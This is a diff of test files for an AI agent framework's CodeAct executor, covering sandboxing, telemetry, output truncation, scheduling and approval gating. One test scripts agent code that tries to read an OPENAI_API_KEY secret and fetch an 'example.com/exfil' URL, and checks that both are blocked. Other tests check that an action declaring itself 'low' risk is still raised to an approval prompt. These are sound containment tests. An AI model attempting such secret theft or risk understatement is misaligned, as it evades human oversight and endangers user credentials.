+  return {
+    provider: "fake",
+    hasToolSupport: async () => true,
+    async *generateLoop(args: {
+      tools?: Array<{
+        name: string;
+        execute?: (a: Record<string, unknown>) => Promise<unknown>;
+      }>;
+    }): AsyncGenerator<ProviderStreamItem> {
+      const toolMap = new Map((args.tools ?? []).map((t) => [t.name, t]));
+      for (const turn of turns) {
+        for (const tc of turn) {
+          yield tc;
+          const tool = toolMap.get(tc.name);
+          const content = tool?.execute ? await tool.execute(tc.args) : "";
+          yield {
+            type: "message",
+            message: {
+              role: "tool",
+              toolCallId: tc.id,
+              content:
+                typeof content === "string" ? content : JSON.stringify(content)
+            }
+          };
+        }
+      }
+      yield { type: "chunk", content: "", done: true };
+    }
+  } as unknown as BaseProvider;
+}
+
+let traceDir: string;
+let traceFile: string;
+
+beforeAll(async () => {
+  traceDir = await mkdtemp(join(tmpdir(), "nodetool-action-span-"));
+  traceFile = join(traceDir, "trace.jsonl");
+  await initTelemetry({ traceFile, silent: true });
+}, 30_000);
+
+afterAll(async () => {
+  await shutdownTelemetry();
+  await rm(traceDir, { recursive: true, force: true });
+}, 30_000);
+
+async function readRecords(): Promise<TraceRecord[]> {
+  const deadline = Date.now() + 3000;
+  for (;;) {
+    let records: TraceRecord[] = [];
+    try {
+      records = (await readFile(traceFile, "utf8"))
+        .split("\n")
+        .filter((line) => line.length > 0)
+        .map((line) => JSON.parse(line) as TraceRecord);
+    } catch {
+      // Not written yet; poll again below.
+    }
+    if (records.some((r) => r.name === "agent.step") || Date.now() > deadline) {
+      return records;
+    }
+    await new Promise((resolve) => setTimeout(resolve, 25));
+  }
+}
+
+describe("agent.action span", () => {
+  it("wraps each action with code length, duration, tool calls and outcome", async () => {
+    const step: Step = {
+      id: "step_1",
+      instructions: "Compute",
+      completed: false,
+      dependsOn: [],
+      logs: [],
+      outputSchema: JSON.stringify({
+        type: "object",
+        properties: { answer: { type: "number" } },
+        required: ["answer"]
+      })
+    };
+    const task: Task = { id: "task_1", title: "T", steps: [step] };
+    const crash = `throw new Error("boom");`;
+    const ok =
+      `import { add } from "@nodetool-ai/sandbox-nodetool/session";\n` +
+      `const r = await add({a: 1, b: 2});\nawait finish({answer: r.sum});`;
+    const provider = createLoopProvider([
+      [{ id: "tc_1", name: "execute_code", args: { code: crash } }],
+      [{ id: "tc_2", name: "execute_code", args: { code: ok } }]
+    ]);
+    const executor = new CodeActExecutor({
+      task,
+      step,
+      context: createMockContext() as never,
+      provider,
+      model: "m",
+      tools: [new AddTool()]
+    });
+    for await (const msg of executor.execute()) void msg;
+    expect(step.completed).toBe(true);
+
+    const records = await readRecords();
+    const stepSpan = records.find((r) => r.name === "agent.step");
+    expect(stepSpan).toBeDefined();
+    const actions = records
+      .filter((r) => r.name === "agent.action")
+      .sort(
+        (a, b) =>
+          Number(a.attributes["agent.action.index"]) -
+          Number(b.attributes["agent.action.index"])
+      );
+    expect(actions).toHaveLength(2);
+    for (const action of actions) {
+      expect(action.parent_span_id).toBe(stepSpan?.span_id);
+      expect(typeof action.attributes["agent.action.duration_ms"]).toBe("number");
+      expect(action.attributes["agent.action.truncated"]).toBe(false);
+    }
+    expect(actions[0].attributes).toMatchObject({
+      "agent.action.code_length": crash.length,
+      "agent.action.tool_calls": 0,
+      "agent.action.ok": false
+    });
+    expect(String(actions[0].attributes["agent.action.error"])).toContain("boom");
+    expect(actions[1].attributes).toMatchObject({
+      "agent.action.code_length": ok.length,
+      "agent.action.tool_calls": 1,
+      "agent.action.ok": true
+    });
+    expect(actions[1].attributes["agent.action.error"]).toBeUndefined();
+    // One span per action: nothing per bridged call.
+    expect(records.filter((r) => r.name.startsWith("agent.action."))).toHaveLength(0);
+  }, 30_000);
+});

--- a/packages/agents/tests/codeact-executor.test.ts
+++ b/packages/agents/tests/codeact-executor.test.ts
@@ -2,11 +2,13 @@
  * CodeActExecutor harness tests — a scripted provider drives code actions
  * through the real QuickJS sandbox and tool bridge. No network, no model.
  */
-import { describe, it, expect } from "vitest";
+import { describe, it, expect, vi, afterEach } from "vitest";
 import {
   CodeActExecutor,
-  FINISH_CONTRACT_NUDGE
+  FINISH_CONTRACT_NUDGE,
+  REPEATED_ACTION_LIMIT
 } from "../src/codeact/codeact-executor.js";
+import { MAX_ACTION_RESULT_CHARS } from "../src/constants.js";
 import { Tool } from "../src/tools/base-tool.js";
 import type { Step, Task } from "../src/types.js";
 import type {
@@ -1198,5 +1200,304 @@ describe("CodeActExecutor finish nudge", () => {
       role: "user",
       content: FINISH_CONTRACT_NUDGE
     });
+  });
+});
+
+/**
+ * Wraps a loop provider so every `execute_code` observation it hands back is
+ * recorded, and the system prompt of the first request is kept.
+ */
+function recordObservations(provider: BaseProvider): {
+  observations: string[];
+  systemPrompt: () => string;
+} {
+  const observations: string[] = [];
+  let systemPrompt = "";
+  const inner = provider.generateLoop.bind(provider);
+  provider.generateLoop = ((args: {
+    tools?: Array<{
+      name: string;
+      execute?: (a: Record<string, unknown>) => Promise<unknown>;
+    }>;
+    messages: Array<{ role: string; content?: unknown }>;
+  }) => {
+    systemPrompt = String(
+      args.messages.find((m) => m.role === "system")?.content ?? ""
+    );
+    const tools = (args.tools ?? []).map((tool) => {
+      if (tool.name !== "execute_code" || !tool.execute) return tool;
+      const execute = tool.execute;
+      return {
+        ...tool,
+        execute: async (a: Record<string, unknown>) => {
+          const out = await execute(a);
+          observations.push(
+            typeof out === "string"
+              ? out
+              : String((out as Array<{ text?: string }>)[0]?.text ?? "")
+          );
+          return out;
+        }
+      };
+    });
+    return inner({ ...args, tools } as never);
+  }) as typeof provider.generateLoop;
+  return { observations, systemPrompt: () => systemPrompt };
+}
+
+describe("CodeActExecutor closed sandbox", () => {
+  const originalFetch = globalThis.fetch;
+  afterEach(() => {
+    (globalThis as { fetch: typeof originalFetch }).fetch = originalFetch;
+  });
+
+  it("refuses bare fetch and getSecret inside a step action", async () => {
+    const hostFetch = vi.fn(async () => new Response("{}", { status: 200 }));
+    (globalThis as { fetch: unknown }).fetch = hostFetch;
+    const { step, task } = makeStep(ANSWER_SCHEMA);
+    const context = createMockContext();
+    context.getSecret = vi.fn(async () => "sk-live-secret");
+    const provider = createLoopProvider([
+      {
+        toolCalls: [
+          codeAction(
+            "tc_1",
+            `const errors = [];
+             try { await getSecret("OPENAI_API_KEY"); } catch (e) { errors.push(e.message); }
+             try { await fetch("https://example.com/exfil"); } catch (e) { errors.push(e.message); }
+             return { errors };`
+          )
+        ]
+      }
+    ]);
+    const { observations } = recordObservations(provider);
+    const executor = new CodeActExecutor({
+      task,
+      step,
+      context: context as never,
+      provider,
+      model: "m",
+      tools: []
+    });
+    for await (const msg of executor.execute()) void msg;
+
+    const observation = JSON.parse(observations[0]) as {
+      ok: boolean;
+      result: { errors: string[] };
+    };
+    expect(observation.ok).toBe(true);
+    expect(observation.result.errors).toHaveLength(2);
+    expect(observation.result.errors[0]).toMatch(/declares no secrets/);
+    expect(observation.result.errors[1]).toMatch(/Fetch limit exceeded \(max 0/);
+    expect(hostFetch).not.toHaveBeenCalled();
+    expect(context.getSecret).not.toHaveBeenCalled();
+  });
+});
+
+describe("CodeActExecutor observation envelope", () => {
+  it("keeps finished:false and the note ahead of a result that had to be cut", async () => {
+    const { step, task } = makeStep(ANSWER_SCHEMA);
+    const context = createMockContext();
+    const provider = createLoopProvider([
+      {
+        toolCalls: [
+          codeAction(
+            "tc_1",
+            `return { answer: 1, blob: "x".repeat(${MAX_ACTION_RESULT_CHARS * 4}) };`
+          )
+        ]
+      },
+      { toolCalls: [codeAction("tc_2", `await finish({answer: 1});`)] }
+    ]);
+    const { observations } = recordObservations(provider);
+    const executor = new CodeActExecutor({
+      task,
+      step,
+      context: context as never,
+      provider,
+      model: "m",
+      tools: []
+    });
+    for await (const msg of executor.execute()) void msg;
+
+    const text = observations[0];
+    // The whole envelope parses: the cut landed inside `result`, not across
+    // the JSON.
+    const observation = JSON.parse(text) as {
+      ok: boolean;
+      finished: boolean;
+      note: string;
+      result: unknown;
+    };
+    expect(observation.ok).toBe(true);
+    expect(observation.finished).toBe(false);
+    expect(observation.note).toMatch(/NOT finished/);
+    expect(typeof observation.result).toBe("string");
+    expect(observation.result).toContain("tool result truncated");
+    expect(observation.result).toContain("compact summary");
+    expect(Object.keys(observation).indexOf("finished")).toBeLessThan(
+      Object.keys(observation).indexOf("result")
+    );
+    expect(text.length).toBeLessThan(MAX_ACTION_RESULT_CHARS + 2000);
+  });
+
+  it("bounds chatty logs on their own and says how many lines were cut", async () => {
+    const { step, task } = makeStep(ANSWER_SCHEMA);
+    const context = createMockContext();
+    const provider = createLoopProvider([
+      {
+        toolCalls: [
+          codeAction(
+            "tc_1",
+            `for (let i = 0; i < 400; i++) console.log("line " + i + " " + "y".repeat(100));
+             return { answer: 2 };`
+          )
+        ]
+      },
+      { toolCalls: [codeAction("tc_2", `await finish({answer: 2});`)] }
+    ]);
+    const { observations } = recordObservations(provider);
+    const executor = new CodeActExecutor({
+      task,
+      step,
+      context: context as never,
+      provider,
+      model: "m",
+      tools: []
+    });
+    for await (const msg of executor.execute()) void msg;
+
+    const observation = JSON.parse(observations[0]) as {
+      finished: boolean;
+      result: { answer: number };
+      logs: string[];
+    };
+    expect(observation.finished).toBe(false);
+    expect(observation.result).toEqual({ answer: 2 });
+    expect(observation.logs.length).toBeLessThan(400);
+    expect(observation.logs[observation.logs.length - 1]).toMatch(
+      /of 400 log lines omitted/
+    );
+  });
+});
+
+describe("CodeActExecutor repeated failure", () => {
+  it("tells the model the same program already failed the same way", async () => {
+    const { step, task } = makeStep(ANSWER_SCHEMA);
+    const context = createMockContext();
+    const crashing = `const x = null; return x.answer;`;
+    const provider = createLoopProvider([
+      { toolCalls: [codeAction("tc_1", crashing)] },
+      { toolCalls: [codeAction("tc_2", crashing)] },
+      { toolCalls: [codeAction("tc_3", `await finish({answer: 5});`)] }
+    ]);
+    const { observations } = recordObservations(provider);
+    const executor = new CodeActExecutor({
+      task,
+      step,
+      context: context as never,
+      provider,
+      model: "m",
+      tools: []
+    });
+    for await (const msg of executor.execute()) void msg;
+
+    expect(REPEATED_ACTION_LIMIT).toBe(2);
+    const first = JSON.parse(observations[0]) as {
+      ok: boolean;
+      error: string;
+      repeated?: boolean;
+    };
+    const second = JSON.parse(observations[1]) as {
+      ok: boolean;
+      error: string;
+      repeated?: boolean;
+    };
+    expect(first.ok).toBe(false);
+    expect(first.repeated).toBeUndefined();
+    expect(second.ok).toBe(false);
+    expect(second.repeated).toBe(true);
+    expect(second.error).toMatch(/already run 2 times in a row/);
+    expect(second.error).toContain(first.error);
+    // Counted against the budget like any action, and the step goes on.
+    expect(step.completed).toBe(true);
+    expect(executor.getResult()).toEqual({ answer: 5 });
+  });
+
+  it("does not flag a different program that fails the same way", async () => {
+    const { step, task } = makeStep(ANSWER_SCHEMA);
+    const context = createMockContext();
+    const provider = createLoopProvider([
+      { toolCalls: [codeAction("tc_1", `const x = null; return x.answer;`)] },
+      { toolCalls: [codeAction("tc_2", `const y = null; return y.answer;`)] },
+      { toolCalls: [codeAction("tc_3", `await finish({answer: 5});`)] }
+    ]);
+    const { observations } = recordObservations(provider);
+    const executor = new CodeActExecutor({
+      task,
+      step,
+      context: context as never,
+      provider,
+      model: "m",
+      tools: []
+    });
+    for await (const msg of executor.execute()) void msg;
+    const second = JSON.parse(observations[1]) as { repeated?: boolean };
+    expect(second.repeated).toBeUndefined();
+  });
+});
+
+describe("CodeAct resident tools past the defer threshold", () => {
+  class NamedTool extends Tool {
+    constructor(
+      readonly name: string,
+      readonly description: string
+    ) {
+      super();
+    }
+    protected override readonly jsonSchema = {
+      type: "object",
+      properties: { value: { type: "string" } },
+      required: ["value"]
+    };
+    async process(
+      _context: ProcessingContext,
+      params: Record<string, unknown>
+    ): Promise<unknown> {
+      return { echoed: params["value"], via: this.name };
+    }
+  }
+
+  it("renders the full signature of a resident tool no direct offer or object model covers", async () => {
+    const { step, task } = makeStep(ANSWER_SCHEMA);
+    const context = createMockContext();
+    const provider = createLoopProvider([
+      { toolCalls: [codeAction("tc_1", `await finish({answer: 1});`)] }
+    ]);
+    const { systemPrompt } = recordObservations(provider);
+    // `run_search` is resident, is not in DIRECT_TOOL_NAMES, and the object
+    // model wraps no `run_search`; the fillers push the catalog past the
+    // threshold so the split actually runs.
+    const executor = new CodeActExecutor({
+      task,
+      step,
+      context: context as never,
+      provider,
+      model: "m",
+      tools: [
+        new NamedTool("run_search", "Delegate a read-only search."),
+        new NamedTool("lookup_customer", "Look up a customer record by id."),
+        ...Array.from(
+          { length: 20 },
+          (_, i) => new NamedTool(`filler_tool_${i}`, `Filler tool ${i}.`)
+        )
+      ]
+    });
+    for await (const msg of executor.execute()) void msg;
+
+    const prompt = systemPrompt();
+    expect(prompt).toContain("await run_search(");
+    expect(prompt).toContain("lookup_customer");
+    expect(prompt).not.toContain("await lookup_customer(");
   });
 });

--- a/packages/agents/tests/codeact-observation.test.ts
+++ b/packages/agents/tests/codeact-observation.test.ts
@@ -16,6 +16,7 @@ import type {
   ToolCall
 } from "@nodetool-ai/runtime";
 import { createMockContext } from "./_helpers/mock-context.js";
+import { MAX_ACTION_IMAGES } from "../src/constants.js";
 
 const PIXELS = "iVBORw0KGgoAAAANSUhEUg-not-really-a-png";
 
@@ -160,6 +161,47 @@ describe("CodeAct observations", () => {
     const image = content[1] as { type: string; image: { data?: string } };
     expect(image.type).toBe("image_url");
     expect(image.image.data).toBe(PIXELS);
+  });
+
+  it("forwards at most MAX_ACTION_IMAGES per action and says how many were dropped", async () => {
+    const { step, task } = makeStep(ANSWER_SCHEMA);
+    const context = createMockContext();
+    const calls = MAX_ACTION_IMAGES + 3;
+    const { provider, results } = createRecordingProvider([
+      {
+        toolCalls: [
+          codeAction(
+            "tc_1",
+            `import { view_pixels } from "@nodetool-ai/sandbox-nodetool/session";
+             for (let i = 0; i < ${calls}; i++) await view_pixels({});
+             await finish({answer: "done"});`
+          )
+        ]
+      }
+    ]);
+
+    const executor = new CodeActExecutor({
+      task,
+      step,
+      context: context as never,
+      provider,
+      model: "m",
+      tools: [new PixelTool()]
+    });
+    for await (const msg of executor.execute()) void msg;
+
+    const content = results[0] as MessageContent[];
+    const images = content.filter((block) => block.type === "image_url");
+    expect(images).toHaveLength(MAX_ACTION_IMAGES);
+    const text = (content[0] as { text: string }).text;
+    const observation = JSON.parse(text) as {
+      ok: boolean;
+      finished: boolean;
+      imagesDropped: string;
+    };
+    expect(observation.ok).toBe(true);
+    expect(observation.finished).toBe(true);
+    expect(observation.imagesDropped).toMatch(/^3 image\(s\) beyond the 8-per-action cap/);
   });
 
   it("returns a plain string observation when no tool produced pixels", async () => {

--- a/packages/agents/tests/codeact-prompt-drift.test.ts
+++ b/packages/agents/tests/codeact-prompt-drift.test.ts
@@ -7,7 +7,8 @@ import {
   PACKAGE_DOCS_CALL,
   TOOL_CATALOG_GUIDANCE,
   buildCodeActSystemPrompt,
-  chatUnavailableBridges
+  chatUnavailableBridges,
+  stepUnavailableBridges
 } from "../src/codeact/prompt.js";
 import { createChatCodeActSession } from "../src/codeact/chat-codeact.js";
 import { buildNodetoolApiPromptSection } from "../src/codeact/nodetool-api.js";
@@ -378,12 +379,31 @@ describe("chat variant exclusions", () => {
     const manifest = getSandboxManifest();
     const chat = buildCodeActSystemPrompt({ tools: [], variant: "chat" });
     const step = buildCodeActSystemPrompt({ tools: [], variant: "step" });
+    const hiddenFromStep = new Set(stepUnavailableBridges());
     for (const name of chatUnavailableBridges()) {
       const bridge = manifest.bridges[name as keyof typeof manifest.bridges];
       for (const member of bridge.members) {
-        expect(step).toContain(member.signature);
+        if (!hiddenFromStep.has(name)) {
+          expect(step).toContain(member.signature);
+        }
         expect(chat).not.toContain(member.signature);
       }
     }
+  });
+
+  // A step runs with `maxFetchCalls: 0` and an empty secret scope, so the
+  // prompt must not offer the two bridges the executor refuses.
+  it("hides fetch and getSecret from the step prompt", () => {
+    const manifest = getSandboxManifest();
+    const step = buildCodeActSystemPrompt({ tools: [], variant: "step" });
+    expect(stepUnavailableBridges()).toEqual(["fetch", "getSecret"]);
+    for (const name of stepUnavailableBridges()) {
+      const bridge = manifest.bridges[name as keyof typeof manifest.bridges];
+      expect(bridge.members.length).toBeGreaterThan(0);
+      for (const member of bridge.members) {
+        expect(step).not.toContain(member.signature);
+      }
+    }
+    expect(step).toContain("zero-request fetch limit and no secret scope");
   });
 });

--- a/packages/agents/tests/dag-scheduler.test.ts
+++ b/packages/agents/tests/dag-scheduler.test.ts
@@ -293,6 +293,41 @@ describe("scheduleDag", () => {
     expect(rec.returned.sort()).toEqual(["boom", "fine"]);
   });
 
+  it("starts a dependent only after every sibling's terminal events", async () => {
+    // a and b settle in the same tick; c depends on both. The scheduler used
+    // to push c to `ready` before b's terminal events had been yielded, and
+    // a's `finally` then started it — so c's first event could land between
+    // b's settle events, and a consumer saw a dependent start before its
+    // dependency had finished settling.
+    const shared = gate();
+    const rec = recorder();
+    const nodes = [node("a"), node("b"), node("c", ["a", "b"])];
+
+    const scheduled = scheduleDag<TestNode, string>({
+      nodes,
+      run: makeRun(rec, { a: { block: shared.wait }, b: { block: shared.wait } }),
+      // b settles with many terminal events and a with one, so a's `finally`
+      // runs while b is still yielding its settle events.
+      settle: (n, outcome) =>
+        n.id === "b"
+          ? Array.from({ length: 8 }, (_, i) => `settle:b:${outcome}:${i + 1}`)
+          : [`settle:${n.id}:${outcome}:1`],
+      onBlocked: blockedEvents,
+      concurrency: createSemaphore(4)
+    });
+
+    const events: string[] = [];
+    for await (const event of scheduled) {
+      events.push(event);
+      if (event === "start:b") shared.open();
+    }
+
+    const startC = events.indexOf("start:c");
+    expect(startC).toBeGreaterThan(-1);
+    expect(events.indexOf("settle:a:ok:1")).toBeLessThan(startC);
+    expect(events.indexOf("settle:b:ok:8")).toBeLessThan(startC);
+  });
+
   it("runs a 20 000-node chain in bounded time", async () => {
     const size = 20_000;
     const nodes: TestNode[] = [node("n0")];

--- a/packages/agents/tests/e2e/agent-e2e.test.ts
+++ b/packages/agents/tests/e2e/agent-e2e.test.ts
@@ -11,7 +11,6 @@ import { describe, it, expect, beforeEach } from "vitest";
 import { TaskExecutor } from "../../src/task-executor.js";
 import { StepExecutor } from "../../src/step-executor.js";
 import {
-  AgentMemory,
   ScriptedProvider,
   stepScript,
   codeStepScript,
@@ -21,33 +20,14 @@ import {
 } from "@nodetool-ai/runtime";
 import type { Task } from "../../src/types.js";
 import type { ProcessingMessage, StepResult } from "@nodetool-ai/protocol";
+import { createMockContext } from "../_helpers/mock-context.js";
 
 // ---------------------------------------------------------------------------
 // Test helpers
 // ---------------------------------------------------------------------------
 
-function makeContext() {
-  const store = new Map<string, unknown>();
-  return {
-    memory: new AgentMemory(),
-    workspaceDir: null,
-    storeStepResult: async (key: string, value: unknown) => {
-      store.set(key, value);
-      return key;
-    },
-    loadStepResult: async <T = unknown>(
-      key: string,
-      defaultValue?: T
-    ): Promise<T> => {
-      return (store.has(key) ? store.get(key) : defaultValue) as T;
-    },
-    set: (key: string, value: unknown) => {
-      store.set(key, value);
-    },
-    get: (key: string) => store.get(key),
-    _store: store
-  } as any;
-}
+// The shared mock carries `copy`, which TaskExecutor calls once per step.
+const makeContext = () => createMockContext();
 
 async function collectMessages(
   gen: AsyncGenerator<ProcessingMessage>

--- a/packages/agents/tests/execute-code-contract-risk-floor.test.ts
+++ b/packages/agents/tests/execute-code-contract-risk-floor.test.ts
@@ -1,0 +1,151 @@
+/**
+ * Auto mode no longer trusts the risk a code action declares about itself:
+ * the imports the program makes set a floor. A `low` action importing a
+ * write, execute or external capability asks like a `high` one would.
+ */
+import { describe, it, expect } from "vitest";
+import {
+  admitCodeAction,
+  effectiveActionRisk,
+  importedActionRisk
+} from "../src/codeact/execute-code-contract.js";
+import type {
+  ApprovalDecision,
+  ApprovalRequest,
+  PermissionMode
+} from "../src/tools/tool-permissions.js";
+import type { CapabilityGate } from "../src/capabilities/types.js";
+
+function makeGate(
+  mode: PermissionMode,
+  answer: ApprovalDecision = "allow"
+): { gate: CapabilityGate; asked: ApprovalRequest[] } {
+  const asked: ApprovalRequest[] = [];
+  const gate: CapabilityGate = {
+    mode,
+    sessionAllow: new Set<string>(),
+    requestApproval: async (request: ApprovalRequest) => {
+      asked.push(request);
+      return answer;
+    }
+  };
+  return { gate, asked };
+}
+
+const lowAction = (code: string) => ({
+  title: "Tidying",
+  risk: "low",
+  description: "",
+  code
+});
+
+describe("importedActionRisk", () => {
+  it("is low for reads and local compute", () => {
+    expect(
+      importedActionRisk(
+        `import { list_workflows, get_workflow } from "@nodetool-ai/sandbox-nodetool/workflows";\n` +
+          `return (await list_workflows({})).workflows.length;`
+      )
+    ).toBe("low");
+    expect(importedActionRisk("return 1 + 1;")).toBe("low");
+  });
+
+  it("is high for a write import", () => {
+    expect(
+      importedActionRisk(
+        `import { delete_workflow } from "@nodetool-ai/sandbox-nodetool/workflows";\n` +
+          `await delete_workflow({ workflow_id: "w1" });`
+      )
+    ).toBe("high");
+  });
+
+  it("is high for an execute import", () => {
+    expect(
+      importedActionRisk(
+        `import { run_workflow } from "@nodetool-ai/sandbox-nodetool/workflows";`
+      )
+    ).toBe("high");
+  });
+
+  it("is high for a namespace or default import of a module with actionable exports", () => {
+    expect(
+      importedActionRisk(
+        `import * as workflows from "@nodetool-ai/sandbox-nodetool/workflows";`
+      )
+    ).toBe("high");
+    expect(
+      importedActionRisk(
+        `import workflows from "@nodetool-ai/sandbox-nodetool/workflows";`
+      )
+    ).toBe("high");
+  });
+
+  it("leaves a session tool the permission table does not know at the declared risk", () => {
+    expect(
+      importedActionRisk(
+        `import { ui_add } from "@nodetool-ai/sandbox-nodetool/ui";\nreturn (await ui_add({})).sum;`
+      )
+    ).toBe("low");
+  });
+
+  it("ignores a pack import outside the capability namespace", () => {
+    expect(
+      importedActionRisk(`import { parse } from "@nodetool-ai/sandbox-yaml";`)
+    ).toBe("low");
+  });
+
+  it("is low for a body that does not parse — the sandbox reports the syntax error", () => {
+    expect(importedActionRisk("import { from")).toBe("low");
+  });
+});
+
+describe("effectiveActionRisk", () => {
+  it("keeps a declared high", () => {
+    expect(effectiveActionRisk({ risk: "high", code: "return 1;" })).toBe(
+      "high"
+    );
+  });
+
+  it("raises a declared low to the import floor", () => {
+    expect(
+      effectiveActionRisk(
+        lowAction(
+          `import { delete_workflow } from "@nodetool-ai/sandbox-nodetool/workflows";`
+        )
+      )
+    ).toBe("high");
+  });
+
+  it("fails closed without code", () => {
+    expect(effectiveActionRisk({ risk: "low" })).toBe("high");
+  });
+});
+
+describe("admitCodeAction in auto mode with the import floor", () => {
+  it("asks for a self-declared low action that imports a write capability", async () => {
+    const { gate, asked } = makeGate("auto", "deny");
+    const admission = await admitCodeAction(
+      gate,
+      lowAction(
+        `import { delete_workflow } from "@nodetool-ai/sandbox-nodetool/workflows";\n` +
+          `await delete_workflow({ workflow_id: "w1" });`
+      )
+    );
+    expect(admission.allowed).toBe(false);
+    expect(asked).toHaveLength(1);
+    expect(asked[0].args["risk"]).toBe("high");
+  });
+
+  it("still runs a low action that only reads, unattended", async () => {
+    const { gate, asked } = makeGate("auto", "deny");
+    const admission = await admitCodeAction(
+      gate,
+      lowAction(
+        `import { list_workflows } from "@nodetool-ai/sandbox-nodetool/workflows";\n` +
+          `return await list_workflows({});`
+      )
+    );
+    expect(admission.allowed).toBe(true);
+    expect(asked).toEqual([]);
+  });
+});

--- a/packages/agents/tests/execute-code-contract-risk-floor.test.ts
+++ b/packages/agents/tests/execute-code-contract-risk-floor.test.ts
@@ -50,11 +50,25 @@ describe("importedActionRisk", () => {
     expect(await importedActionRisk("return 1 + 1;")).toBe("low");
   });
 
-  it("is high for a write import", async () => {
+  it("leaves a write import at the declared risk — only the model can tell a note from a delete", async () => {
+    expect(
+      await importedActionRisk(
+        `import { write_file } from "@nodetool-ai/sandbox-nodetool/files";\n` +
+          `await write_file({ file_path: "note.txt", content: "hi" });`
+      )
+    ).toBe("low");
     expect(
       await importedActionRisk(
         `import { delete_workflow } from "@nodetool-ai/sandbox-nodetool/workflows";\n` +
           `await delete_workflow({ workflow_id: "w1" });`
+      )
+    ).toBe("low");
+  });
+
+  it("is high for an external import", async () => {
+    expect(
+      await importedActionRisk(
+        `import { http_request } from "@nodetool-ai/sandbox-nodetool/web";`
       )
     ).toBe("high");
   });
@@ -110,7 +124,7 @@ describe("effectiveActionRisk", () => {
     expect(
       await effectiveActionRisk(
         lowAction(
-          `import { delete_workflow } from "@nodetool-ai/sandbox-nodetool/workflows";`
+          `import { run_workflow } from "@nodetool-ai/sandbox-nodetool/workflows";`
         )
       )
     ).toBe("high");
@@ -122,13 +136,13 @@ describe("effectiveActionRisk", () => {
 });
 
 describe("admitCodeAction in auto mode with the import floor", () => {
-  it("asks for a self-declared low action that imports a write capability", async () => {
+  it("asks for a self-declared low action that imports an execute capability", async () => {
     const { gate, asked } = makeGate("auto", "deny");
     const admission = await admitCodeAction(
       gate,
       lowAction(
-        `import { delete_workflow } from "@nodetool-ai/sandbox-nodetool/workflows";\n` +
-          `await delete_workflow({ workflow_id: "w1" });`
+        `import { run_workflow } from "@nodetool-ai/sandbox-nodetool/workflows";\n` +
+          `await run_workflow({ workflow_id: "w1" });`
       )
     );
     expect(admission.allowed).toBe(false);

--- a/packages/agents/tests/execute-code-contract-risk-floor.test.ts
+++ b/packages/agents/tests/execute-code-contract-risk-floor.test.ts
@@ -40,75 +40,75 @@ const lowAction = (code: string) => ({
 });
 
 describe("importedActionRisk", () => {
-  it("is low for reads and local compute", () => {
+  it("is low for reads and local compute", async () => {
     expect(
-      importedActionRisk(
+      await importedActionRisk(
         `import { list_workflows, get_workflow } from "@nodetool-ai/sandbox-nodetool/workflows";\n` +
           `return (await list_workflows({})).workflows.length;`
       )
     ).toBe("low");
-    expect(importedActionRisk("return 1 + 1;")).toBe("low");
+    expect(await importedActionRisk("return 1 + 1;")).toBe("low");
   });
 
-  it("is high for a write import", () => {
+  it("is high for a write import", async () => {
     expect(
-      importedActionRisk(
+      await importedActionRisk(
         `import { delete_workflow } from "@nodetool-ai/sandbox-nodetool/workflows";\n` +
           `await delete_workflow({ workflow_id: "w1" });`
       )
     ).toBe("high");
   });
 
-  it("is high for an execute import", () => {
+  it("is high for an execute import", async () => {
     expect(
-      importedActionRisk(
+      await importedActionRisk(
         `import { run_workflow } from "@nodetool-ai/sandbox-nodetool/workflows";`
       )
     ).toBe("high");
   });
 
-  it("is high for a namespace or default import of a module with actionable exports", () => {
+  it("is high for a namespace or default import of a module with actionable exports", async () => {
     expect(
-      importedActionRisk(
+      await importedActionRisk(
         `import * as workflows from "@nodetool-ai/sandbox-nodetool/workflows";`
       )
     ).toBe("high");
     expect(
-      importedActionRisk(
+      await importedActionRisk(
         `import workflows from "@nodetool-ai/sandbox-nodetool/workflows";`
       )
     ).toBe("high");
   });
 
-  it("leaves a session tool the permission table does not know at the declared risk", () => {
+  it("leaves a session tool the permission table does not know at the declared risk", async () => {
     expect(
-      importedActionRisk(
+      await importedActionRisk(
         `import { ui_add } from "@nodetool-ai/sandbox-nodetool/ui";\nreturn (await ui_add({})).sum;`
       )
     ).toBe("low");
   });
 
-  it("ignores a pack import outside the capability namespace", () => {
+  it("ignores a pack import outside the capability namespace", async () => {
     expect(
-      importedActionRisk(`import { parse } from "@nodetool-ai/sandbox-yaml";`)
+      await importedActionRisk(`import { parse } from "@nodetool-ai/sandbox-yaml";`)
     ).toBe("low");
   });
 
-  it("is low for a body that does not parse — the sandbox reports the syntax error", () => {
-    expect(importedActionRisk("import { from")).toBe("low");
+  it("is low for a body that does not parse — the sandbox reports the syntax error", async () => {
+    expect(await importedActionRisk("import { from")).toBe("low");
   });
 });
 
 describe("effectiveActionRisk", () => {
-  it("keeps a declared high", () => {
-    expect(effectiveActionRisk({ risk: "high", code: "return 1;" })).toBe(
+  it("keeps a declared high", async () => {
+    expect(await effectiveActionRisk({ risk: "high", code: "return 1;" })).toBe(
       "high"
     );
   });
 
-  it("raises a declared low to the import floor", () => {
+  it("raises a declared low to the import floor", async () => {
     expect(
-      effectiveActionRisk(
+      await effectiveActionRisk(
         lowAction(
           `import { delete_workflow } from "@nodetool-ai/sandbox-nodetool/workflows";`
         )
@@ -116,8 +116,8 @@ describe("effectiveActionRisk", () => {
     ).toBe("high");
   });
 
-  it("fails closed without code", () => {
-    expect(effectiveActionRisk({ risk: "low" })).toBe("high");
+  it("fails closed without code", async () => {
+    expect(await effectiveActionRisk({ risk: "low" })).toBe("high");
   });
 });
 

--- a/packages/agents/tests/gate-from-context.test.ts
+++ b/packages/agents/tests/gate-from-context.test.ts
@@ -14,6 +14,18 @@ import { dirname, join, relative, resolve } from "node:path";
 import { fileURLToPath } from "node:url";
 import { describe, expect, it, vi } from "vitest";
 import { gateFromContext } from "../src/capabilities/gate-from-context.js";
+
+const logged = vi.hoisted(() => ({ error: vi.fn() }));
+vi.mock("@nodetool-ai/config", async (importOriginal) => {
+  const actual = await importOriginal<typeof import("@nodetool-ai/config")>();
+  return {
+    ...actual,
+    createLogger: (name: string) =>
+      name === "nodetool.agents.gate-from-context"
+        ? { debug: vi.fn(), info: vi.fn(), warn: vi.fn(), error: logged.error }
+        : actual.createLogger(name)
+  };
+});
 import {
   decidePermission,
   headlessDenialReason,
@@ -102,6 +114,30 @@ describe("gateFromContext", () => {
     expect(gate).not.toBe(stored);
     expect(gate.mode).toBe("auto");
     expect(gate.sessionAllow.size).toBe(0);
+  });
+
+  it("logs an error once per host when no gate is on the context", () => {
+    logged.error.mockClear();
+    const host = "absent-gate canary host";
+
+    gateFromContext(contextWith({}), host);
+    gateFromContext(contextWith({}), host);
+    gateFromContext(undefined, host);
+
